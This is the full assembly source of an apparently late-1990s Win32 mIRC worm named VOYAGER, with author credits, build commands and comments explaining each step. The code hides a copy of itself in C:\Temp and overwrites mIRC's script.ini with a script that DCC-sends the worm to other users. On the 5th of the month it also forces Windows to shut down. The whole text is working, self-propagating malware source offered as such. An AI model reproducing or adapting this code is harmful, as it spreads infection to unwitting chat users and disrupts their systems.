; ; VOYAGER.mIRC.Worm.Win32 ; by Bumblebee/[Hail and Kill] ; ; . This is a simple mIRC worm. Creates -if not exists- a directory ; called 'C:\Temp' and stores there 'Voyager.exe'. Then searches for ; mIRC in 'c:\mirc' and 'c:\mirc32'. If mIRC is found then deletes ; the 'script.ini' and writes its own script. ; ; . Sets to 'Voyager.exe' read-only and hidden attributes. ; . ExitWindows if Voyager is executed in payload date. ; ; . Is a Win32 program -only uses API- and due to this it must work ; fine under Win95/Win98/WinNT. Is small but -fucking windows- its ; size is 4096 bytes long. ; ; tasm /ml /m3 v32,,; ; tlink32 -Tpe -c v32,v32,, import32.lib ; .386 locals jumps .model flat,STDCALL ; procs to import extrn CreateFileA:PROC extrn WriteFile:PROC extrn CloseHandle:PROC extrn DeleteFileA:PROC extrn ExitProcess:PROC extrn GetCommandLineA:PROC extrn GetCurrentDirectoryA:PROC extrn SetCurrentDirectoryA:PROC extrn CreateDirectoryA:PROC extrn VirtualAlloc:PROC extrn CopyFileA:PROC extrn SetFileAttributesA:PROC extrn GetSystemTime:PROC extrn ExitWindowsEx:PROC virusSize equ 4096 scriptSize equ endScript-mIRCScript .DATA db 0dh,0ah id db 'VOYAGER.mIRC.Worm.Win32 by Bumblebee/[Hail and Kill]',0 db 0dh,0ah scriptName db 'Script.ini',0 virusDir db 'C:\Temp',0 destVir db 'C:\Temp\Voyager.exe',0 mIRCScript db '[SCRIPT]',0,0dh,0ah db 'n0=on 1:TEXT:*sting*:#:/msg $chan VOYAGER.mIRC.Worm.Win32' db ' by Bumblebee/[Hail and Kill] at your service!',0 db 0dh,0ah db 'n1=on 1:TEXT:*bee*:#:/msg $chan The way of the bee!',0 db 0dh,0ah db 'n2=on 1:FILESENT:*.*:/if ( $me != $nick ) { /dcc send' db ' $nick c:\temp\voyager.exe }',0,0dh,0ah endScript db 0 mIRCDir0 db 'c:\mirc',0 mIRCDir1 db 'c:\mirc32',0 fHnd dd ? cdirHnd dd ? commandLine dd ? size2Read dd 0 sysTimeStruct db 16 dup(0) .CODE inicio: call GetCommandLineA ; get command line mov dword ptr [commandLine],eax skipArgs: ; skip args cmp dword ptr [eax],'EXE.' je argsOk inc eax jmp skipArgs argsOk: add eax,4 mov byte ptr [eax],0 push 00000004h ; read/write page push 00001000h ; mem commit (reserve phys mem) push 1024 ; size to alloc push 0h ; let system decide where to alloc call VirtualAlloc cmp eax,0 je goOut ; ops... not memory to alloc? mov dword ptr [cdirHnd],eax push dword ptr [cdirHnd] ; get current directory push 1024 call GetCurrentDirectoryA cmp eax,0 je goErrOut goDir: lea eax,virusDir push eax call SetCurrentDirectoryA cmp eax,0 jne skipCreateDir ; directory exists xor eax,eax push 0 lea eax,virusDir push eax call CreateDirectoryA ; create the directory cmp eax,0 je goOut jmp goDir skipCreateDir: push 0 ; overwrite if exists lea eax,destVir push eax push dword ptr [commandLine] call CopyFileA ; install Voyager into c:\Temp cmp eax,0 je mIRCCheck push 00000001h OR 00000002h ; set read only and hidden lea eax,destVir push eax call SetFileAttributesA ; set voyager new attributes mIRCCheck: lea eax,mIRCDir0 push eax call SetCurrentDirectoryA cmp eax,0 je installScript ; directory exists -> mIRC found! lea eax,mIRCDir1 push eax call SetCurrentDirectoryA cmp eax,0 jne goOut ; directory exists -> mIRC found! installScript: lea eax,scriptName push eax ; delete script.ini call DeleteFileA xor eax,eax push eax push 00000020h ; archive push 1 push eax push 00000001h OR 00000002h push 40000000h lea eax,scriptName push eax call CreateFileA ; open new script for write (shared) cmp eax,-1 je goOut mov dword ptr [fHnd],eax push 0 mov dword ptr [size2Read],0 lea eax,size2Read push eax mov eax,scriptSize push eax lea eax,mIRCScript push eax push dword ptr [fHnd] call WriteFile ; write script.ini mov eax,dword ptr [fHnd] ; close file push eax call CloseHandle goOut: push dword ptr [cdirHnd] ; restore work directory call SetCurrentDirectoryA goErrOut: lea eax,sysTimeStruct ; check for payload push eax call GetSystemTime lea eax,sysTimeStruct ; 5th day of month? cmp word ptr [eax+6],5 jne exitLoop xor eax,eax mov eax,1 or eax,4 push eax push eax call ExitWindowsEx ; close windows ;) exitLoop: push 0h ; exit call ExitProcess jmp exitLoop Ends End inicio